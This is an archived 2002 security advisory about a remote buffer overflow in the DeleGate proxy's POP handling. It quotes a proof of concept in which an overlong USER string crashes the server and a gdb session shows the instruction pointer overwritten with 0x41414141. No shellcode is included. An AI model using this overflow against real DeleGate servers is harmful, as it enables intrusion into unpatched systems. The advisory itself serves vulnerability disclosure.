Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx5082.htm

DeleGate remote buffer overflow



8th Feb 2002 [SBWID-5082]
COMMAND

	DeleGate remote buffer overflow

SYSTEMS AFFECTED

	All through to the current version (as of 08 February 2002)

PROBLEM

	In Tom Parker [http://www.globalintersec.com] advisory [2002012101] :
	

	--snip--
	

	The below SIGSEGV occurs due to  the  use  of  globally  declared  array
	size, ie: pop.c:28:#define LNSIZE 1024
	

	This is used to set sizes of a number of arrays, including that  of  the
	username and password.
	

	As with many of the vulnerabilities in DeleGate, a SIGSEGV  occurs  when
	attempting to strcpy() unexpectedly long strings. In spite  of  attempts
	DeleGate  makes  to  randomise  the  stack,  we   were   successful   in
	overwriting  the  Extended  instruction  pointer.  Although  the   stack
	randomisation functions make things harder, they do not  make  arbitrary
	command execution impossible.
	

	 Attacking target `xxx.xxxx.xxx.xxx`:

	 : +OK Proxy-POP server (DeleGate/7.7.1 by ysato@delegate.org) at xxx.xxx.xxx.xxx starting.

	 Sleeping for 20 seconds, attach gdb ;-)

	

	 root@foo:/home/foo/delegate7.7.1/src > ps -ax | grep DeleGate

	 30215 ?        S      0:00

	DeleGate -{016+00:foo.bar.com}[pop://-/]-Pxxx.xxx.xxx.xxx:110 --

	   root@foo:/home/foo/delegate7.7.1/src > gdb delegated

	

	 GNU gdb 5.0

	 Copyright 2000 Free Software Foundation, Inc.

	 GDB is free software, covered by the GNU General Public License, and you

	are

	 welcome to change it and/or distribute copies of it under certain

	conditions.

	 Type \"show copying\" to see the conditions.

	 There is absolutely no warranty for GDB.  Type \"show warranty\" for details.

	 This GDB was configured as \"i386-suse-linux\"...

	

	 (gdb) at 30215

	 Attaching to program: /home/foo/delegate7.7.1/src/delegated, Pid 30179

	 Reading symbols from /lib/libnsl.so.1...done.

	 Loaded symbols for /lib/libnsl.so.1

	 Reading symbols from /lib/libc.so.6...done.

	 Loaded symbols for /lib/libc.so.6

	 Reading symbols from /lib/ld-linux.so.2...done.

	 Loaded symbols for /lib/ld-linux.so.2

	 Reading symbols from /lib/libnss_compat.so.2...done.

	 Loaded symbols for /lib/libnss_compat.so.2

	 Reading symbols from /lib/libnss_files.so.2...done.

	 Loaded symbols for /lib/libnss_files.so.2

	 Reading symbols from /lib/libnss_dns.so.2...done.

	 Loaded symbols for /lib/libnss_dns.so.2

	 Reading symbols from /lib/libresolv.so.2...done.

	 Loaded symbols for /lib/libresolv.so.2

	 0x40101167 in poll () from /lib/libc.so.6

	

	 -> USER AAAAAAAAAAAA<~1024 Bytes>

	

	 (gdb) c

	 Continuing.

	 Program received signal SIGSEGV, Segmentation fault.

	 0x41414141 in ?? ()

	 (gdb) print $eip

	 $1 = (void *) 0x41414141

	 (gdb)

	

	 In the case of a *real* exploit, the EIP could be a pointer to

	 the attackers shellcode which would already be in memory.

	

	--snap--

SOLUTION

	None yet


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH